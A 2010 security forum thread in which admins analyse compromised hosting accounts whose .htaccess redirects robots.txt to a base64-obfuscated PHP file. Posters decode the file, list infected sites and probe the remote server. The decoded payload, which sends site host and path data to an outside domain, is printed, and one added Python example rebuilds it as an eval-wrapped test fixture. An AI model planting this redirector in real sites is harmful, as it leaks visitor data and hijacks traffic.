Author Topic: robots.txt redirects to svainefler.info  (Read 4837 times)


May 20, 2010, 07:21:45 am

foks

I work at a pretty large web hosting company. Some days ago a lot of FTP accounts got attacked.

In .htaccess these rows were added:
Code: [Select]
RewriteEngine Off
RewriteEngine On
RewriteBase /
RewriteRule robots\.txt$ includ2e/robots.php [R=301,L]

Robots.php has base64-encoded data, which decodes to this:
Code: [Select]
$fid = '4506';   // campaign/affiliate id sent to the remote server

// check-in URL: the id plus the victim's host name and the path that was requested
$gto="http://get.svainefler.info/g-f/?asd=".$fid."&url=".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
// fetch the remote response server-side (the response body itself is never output)
$res=file_get_contents($gto);
// if nothing came back, send the visitor to the remote URL instead; otherwise only print a message
if (!$res) header ("Location: ".$gto);else  echo "Redirecting...";

One more file was uploaded; this file simply runs any PHP commands you post to it.

http://get.svainefler.info/g-f/ gives "Account closed", but that might be because I'm trying with the wrong user agent.

Does anyone know the purpose of this attack? As far as I know, robots.txt can only be used to block pages from being indexed.
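
An added example, not code from this thread or from any of its posters: a Python triage script for one hosting account that flags the two artefacts described above (a RewriteRule sending robots.txt to a PHP file, and a PHP file arriving wrapped in base64_decode()), peels the wrapper and pulls the campaign id ($fid) and check-in URL prefix out of the decoded payload as indicators. The sample account tree it builds is constructed here from the snippets in the post; the directory name includ2e, the rewrite rows and the decoded PHP are from the thread, while the eval()/echo() wrapper shape, the file layout and the regexes are assumptions of this example.

```python
import base64
import os
import re
import tempfile

# RewriteRule whose pattern matches robots.txt and whose target is a PHP file,
# as in the .htaccess rows quoted above (flags such as [R=301,L] are optional)
REWRITE_RE = re.compile(
    r"^\s*RewriteRule\s+(\S*robots\\?\.txt\$?)\s+(\S+\.php)\s*(\[[^\]]*\])?",
    re.IGNORECASE | re.MULTILINE,
)
# eval()/echo() of base64_decode('...'): assumed shape of the wrapper robots.php ships in
B64_WRAPPER_RE = re.compile(
    r"(?:eval|echo)\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)",
    re.IGNORECASE,
)
# Indicators inside the decoded payload: campaign id and check-in URL prefix
FID_RE = re.compile(r"\$fid\s*=\s*['\"]([^'\"]+)['\"]")
C2_RE = re.compile(r"['\"](https?://[^'\"?]+\?asd=)['\"]")


def find_robots_rewrites(htaccess_text):
    """Return (pattern, target, flags) for each rule that sends robots.txt to a PHP file."""
    return [(m.group(1), m.group(2), m.group(3) or "")
            for m in REWRITE_RE.finditer(htaccess_text)]


def decode_wrapper(php_text, max_depth=10):
    """Peel nested base64_decode() wrappers. Returns (layers_removed, innermost_text)."""
    depth, current = 0, php_text
    while depth < max_depth:
        m = B64_WRAPPER_RE.search(current)
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            current = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: stop and report what we have
            break
        depth += 1
    return depth, current


def extract_iocs(payload):
    """Pull the campaign id and the C2 URL prefix out of a decoded robots.php."""
    fid, c2 = FID_RE.search(payload), C2_RE.search(payload)
    return {"fid": fid.group(1) if fid else None, "c2": c2.group(1) if c2 else None}


def scan_webroot(root):
    """Walk one hosting account; report robots.txt rewrites and obfuscated PHP files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                for pattern, target, flags in find_robots_rewrites(text):
                    findings.append({"type": "htaccess_rewrite", "path": path,
                                     "pattern": pattern, "target": target, "flags": flags})
            elif name.lower().endswith(".php"):
                depth, payload = decode_wrapper(text)
                if depth:
                    finding = {"type": "obfuscated_php", "path": path, "depth": depth}
                    finding.update(extract_iocs(payload))
                    findings.append(finding)
    return findings


def build_fixture():
    """CONSTRUCTED test account: the .htaccess rows and decoded PHP from the post,
    re-wrapped in base64 the way the dropper is assumed to ship it."""
    root = tempfile.mkdtemp(prefix="acct_")
    os.makedirs(os.path.join(root, "includ2e"))
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine Off\nRewriteEngine On\nRewriteBase /\n"
                 "RewriteRule robots\\.txt$ includ2e/robots.php [R=301,L]\n")
    payload = ("$fid = '4506';\n"
               "$gto=\"http://get.svainefler.info/g-f/?asd=\".$fid.\"&url=\""
               ".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];\n"
               "$res=file_get_contents($gto);\n"
               "if (!$res) header (\"Location: \".$gto);else echo \"Redirecting...\";\n")
    blob = base64.b64encode(payload.encode()).decode()
    with open(os.path.join(root, "includ2e", "robots.php"), "w") as fh:
        fh.write("<?php eval(base64_decode('%s')); ?>" % blob)
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'clean'; ?>\n")  # control file: must not be flagged
    return root


if __name__ == "__main__":
    for finding in scan_webroot(build_fixture()):
        print(finding)
```

Run it against the real account root instead of the fixture to get the same two finding types; the decoded payload is kept in memory only, so nothing from the dropper is executed. The wrapper regex is deliberately narrow (eval/echo straight around base64_decode); droppers that split the blob across variables or chain gzinflate() need another layer in decode_wrapper.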

May 20, 2010, 08:23:09 am
Reply #1

SysAdMini

Would you please post Robots.php and the other file in a password-protected zip file?

What is the location of the other file ?
Ruining the bad guy's day

May 20, 2010, 09:42:31 am
Reply #2

foks

Zip file password: 123456
I have added all files that were uploaded.

May 20, 2010, 11:05:38 am
Reply #3

philipp

Now that is interesting.

The following subdomains resolve; svainefler.info doesn't:
get.svainefler.info
5716.svainefler.info
my.svainefler.info

I could not find anything interesting there, except for
Code: [Select]
403 http://get.svainefler.info/1/
but that doesn't help much :D

Code: [Select]
Domain: svainefler.info
Reg: contact@privacyprotect.org
IP: 111.221.47.137
RDNS:
ASN: 24312 (SG)

According to a quick Google search, the following websites are infected:
Code: [Select]
http://www.ligaloto.com/includ2e/robots.php
http://www.horsez.be/
http://www.jotya.com/
http://www.achatmaroc.com/
http://www.josef-neuhauser.at/includ2e/robots.php
http://www.budgettyres.plus.com/
http://www.dsquared.com/includ2e/robots.php
http://users.telenet.be/stippi/

with the following path/file combinations seen:
Code: [Select]
/includ2e/14mg.php
/includ2e/c7ss.php
/includ2e/robots.php
/includ2e/sty6le.php
/includ2e/temp9lates.php
/includ2e/us8ers.php

/2wu/1nc.php
/2wu/robots.php

/5pf/1mg.php
/5pf/robots.php

/7a/_cache.php
/7a/robots.php

/pw/media_.php
/pw/robots.php

/yzs18yzy7/c1ass.php
/yzs18yzy7/robots.php

On a side note (probably irrelevant here):
Koobface
Code: [Select]
http://www.achatmaroc.com/.sys/
http://www.jotya.com/.sys/

May 20, 2010, 11:21:34 am
Reply #4

foks

Quote from: philipp
On a side note (probably irrelevant here):
Koobface
Code: [Select]
http://www.achatmaroc.com/.sys/
http://www.jotya.com/.sys/

Yeah, some of the accounts I found had been infected by Koobface since March, but for some reason these Koobface pages were never accessed.

May 20, 2010, 12:48:39 pm
Reply #5

Kimberly

You might need the full URL + params to get content

Code: [Select]
http://get.svainefler.info/g-f/?asd=4506&url=http://example.com/index.html

May 20, 2010, 12:56:07 pm
Reply #6

SysAdMini

Quote from: Kimberly
You might need the full URL + params to get content

Code: [Select]
http://get.svainefler.info/g-f/?asd=4506&url=http://example.com/index.html

I think you need a PHP user agent too.

May 20, 2010, 01:27:07 pm
Reply #7

foks

Quote from: SysAdMini
Quote from: Kimberly
You might need the full URL + params to get content

Code: [Select]
http://get.svainefler.info/g-f/?asd=4506&url=http://example.com/index.html

I think you need a PHP user agent too.

PHP's user agent is empty by default (http://www.electrictoolbox.com/php-change-user-agent-string/). I tried with:
Code: [Select]
wget -U "" "http://get.svainefler.info/g-f/?asd=4506&url=http://www.jotya.com/yzs18yzy7/robots.php"
but the only result is:
Account closed

I also checked with a URL where I know that 4506 is the asd number the URL uses.

May 21, 2010, 10:40:52 am
Reply #8

MysteryFCM

Only taken a quick look so far, but:

Code: [Select]
http://www.jotya.com/.sys/dat/
.sys confirms Koobface.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 24, 2010, 06:28:03 pm
Reply #9

RichardW

This looks like a two-part attack. robots.txt by its very nature is publicly available, and accessed A LOT by crawlers. The robots.php includes a flag. If the script can't execute, it at least poisons the site's referral stats (an unsuspecting webmaster can click on this), and if it can execute, it's possibly poisoning the search engine results due to the use of a 301 Permanent redirect.

You see that in the robots.php they're executing/decoding on the fly due to the use of echo(base64_decode()). I'm sure this is obfuscating against IDS inspection. But that's okay, now we can just look for the use of base64_decode in robots.*   ;D
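
An added example, not from the thread: detection logic over Apache combined-format access log lines that picks out the log-side signals of this campaign: robots.txt answered with a 301/302 instead of a 200 (the redirect RichardW describes), crawler user agents following that redirect, hits on PHP files in the dropped directories listed earlier in the thread (includ2e, 2wu, 5pf, 7a, pw, yzs18yzy7), and POSTs to those files (the "runs any PHP commands you post" backdoor). The log lines are constructed for this example using documentation IP ranges; the directory list is from the thread, the crawler user-agent list and everything else are assumptions.

```python
import re

# Apache/nginx "combined" log format (the constructed sample lines below follow it)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Directories the dropped files were seen in (list taken from the thread)
DROP_DIRS = ("includ2e", "2wu", "5pf", "7a", "pw", "yzs18yzy7")
DROP_PATH_RE = re.compile(r"^/(?:%s)/[^/]+\.php$" % "|".join(map(re.escape, DROP_DIRS)))
# Assumption: a few well-known crawler UA substrings are enough for triage
CRAWLER_UA_RE = re.compile(r"googlebot|bingbot|slurp|yandex|baiduspider|msnbot", re.I)

# CONSTRUCTED sample log: one crawler redirected off robots.txt into the dropper,
# one operator POSTing to the backdoor, and two ordinary requests as controls
SAMPLE_LINES = [
    '66.249.66.1 - - [20/May/2010:06:01:12 +0000] "GET /robots.txt HTTP/1.1" 301 231 "-" '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '66.249.66.1 - - [20/May/2010:06:01:13 +0000] "GET /includ2e/robots.php HTTP/1.1" 200 14 "-" '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.9 - - [20/May/2010:06:05:40 +0000] "POST /includ2e/us8ers.php HTTP/1.1" 200 512 "-" '
    '"Mozilla/4.0"',
    '198.51.100.7 - - [20/May/2010:06:07:02 +0000] "GET /index.html HTTP/1.1" 200 4012 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/May/2010:06:07:03 +0000] "GET /robots.txt HTTP/1.1" 200 68 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string before matching
    return rec


def analyse(lines):
    """Sort log records into the four signals of this campaign."""
    out = {"robots_redirects": [], "crawlers_redirected": [],
           "dropper_hits": [], "backdoor_posts": []}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # a healthy robots.txt answers 200 (or 404); a redirect is the .htaccess rule firing
        if rec["path"] == "/robots.txt" and rec["status"] in (301, 302):
            out["robots_redirects"].append(rec)
            if CRAWLER_UA_RE.search(rec["ua"]):
                out["crawlers_redirected"].append(rec)
        # any PHP under a dropped directory, or a robots.php anywhere
        if DROP_PATH_RE.match(rec["path"]) or rec["path"].endswith("/robots.php"):
            if rec["method"] == "POST":
                out["backdoor_posts"].append(rec)
            else:
                out["dropper_hits"].append(rec)
    return out


def suspicious_ips(lines):
    """Source IPs that POSTed to a dropped file: candidates for the operator's addresses."""
    return sorted({r["ip"] for r in analyse(lines)["backdoor_posts"]})


if __name__ == "__main__":
    result = analyse(SAMPLE_LINES)
    for key, recs in result.items():
        print("%-20s %d" % (key, len(recs)))
    print("operator IPs:", suspicious_ips(SAMPLE_LINES))
```

Feed it the per-vhost access logs of every account on the box (zcat the rotated ones too, since foks notes the Koobface pages sat unused since March). Sites that redirect every request from http to https will show robots.txt 301s legitimately; check the Location header or the target of the follow-up request, as in the sample, before calling an account infected.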

May 24, 2010, 06:41:35 pm
Reply #10

MysteryFCM
